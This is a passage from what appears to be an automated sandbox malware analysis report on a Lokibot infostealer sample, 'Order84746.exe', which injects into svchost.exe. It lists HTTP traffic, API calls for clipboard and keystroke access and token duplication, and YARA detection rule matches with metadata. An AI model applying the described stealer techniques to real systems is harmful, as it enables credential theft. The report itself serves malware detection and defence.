              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:37:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 29 Nov 2024 06:38:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: svchost.exe, svchost.exe, 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00936B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00936B0C
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00936D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00936D07
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00936B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00936B0C
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00922B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00922B37
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0094F7FF

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: Process Memory Space: Order84746.exe PID: 280, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 3300, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Binary is likely a compiled AutoIt script file
              Source: C:\Users\user\Desktop\Order84746.exeCode function: This is a third-party compiled AutoIt script.0_2_008E3D19
              Source: Order84746.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: Order84746.exe, 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_87013436-3
              Source: Order84746.exe, 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8039831c-3
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: Order84746.exe
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E3742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_008E3742
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009500AF NtdllDialogWndProc_W,0_2_009500AF
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00950133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_00950133
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0095044C NtdllDialogWndProc_W,0_2_0095044C
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094E9AF NtdllDialogWndProc_W,CallWindowProcW,0_2_0094E9AF
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FAAFC NtdllDialogWndProc_W,0_2_008FAAFC
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FAB4F NtdllDialogWndProc_W,0_2_008FAB4F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094EC7C NtdllDialogWndProc_W,0_2_0094EC7C
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0094EEEB
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_0094F1D7
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FB11F NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,0_2_008FB11F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F2D0 SendMessageW,NtdllDialogWndProc_W,0_2_0094F2D0
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FB385 GetParent,NtdllDialogWndProc_W,0_2_008FB385
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0094F351
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F5AB NtdllDialogWndProc_W,0_2_0094F5AB
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F5DA NtdllDialogWndProc_W,0_2_0094F5DA
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FB55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_008FB55D
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F689 ClientToScreen,NtdllDialogWndProc_W,0_2_0094F689
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F609 NtdllDialogWndProc_W,0_2_0094F609
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F654 NtdllDialogWndProc_W,0_2_0094F654
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F7C3 GetWindowLongW,NtdllDialogWndProc_W,0_2_0094F7C3
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0094F7FF
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FB715 NtdllDialogWndProc_W,0_2_008FB715
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,1_2_00FA3540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA33C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,1_2_00FA33C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA2720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,1_2_00FA2720
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00926685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00926685
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746D5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_0091ACC5
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009279D3
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0090B0430_2_0090B043
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091410F0_2_0091410F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009002A40_2_009002A4
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091038E0_2_0091038E
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008EE3B00_2_008EE3B0
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009006D90_2_009006D9
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091467F0_2_0091467F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094AACE0_2_0094AACE
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00914BEF0_2_00914BEF
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0090CCC10_2_0090CCC1
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E6F070_2_008E6F07
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008EAF500_2_008EAF50
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009431BC0_2_009431BC
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0090D1B90_2_0090D1B9
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FB11F0_2_008FB11F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008F32000_2_008F3200
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0090123A0_2_0090123A
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091724D0_2_0091724D
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009213CA0_2_009213CA
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E93F00_2_008E93F0
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FF5630_2_008FF563
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E96C00_2_008E96C0
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0092B6CC0_2_0092B6CC
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E77B00_2_008E77B0
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0094F7FF0_2_0094F7FF
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009179C90_2_009179C9
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FFA570_2_008FFA57
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E9B600_2_008E9B60
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008F3B700_2_008F3B70
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E7D190_2_008E7D19
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00909ED00_2_00909ED0
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008FFE6F0_2_008FFE6F
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_008E7FA30_2_008E7FA3
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_011DC2480_2_011DC248
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040549C1_2_0040549C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004029D41_2_004029D4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA27201_2_00FA2720
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00405B6F appears 42 times
              Source: C:\Users\user\Desktop\Order84746.exeCode function: String function: 00906AC0 appears 42 times
              Source: C:\Users\user\Desktop\Order84746.exeCode function: String function: 0090F8A0 appears 35 times
              Source: C:\Users\user\Desktop\Order84746.exeCode function: String function: 008FEC2F appears 68 times
              Source: Order84746.exe, 00000000.00000003.1675657454.0000000003C3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order84746.exe
              Source: Order84746.exe, 00000000.00000003.1674814255.00000000039E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order84746.exe
              Source: Order84746.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
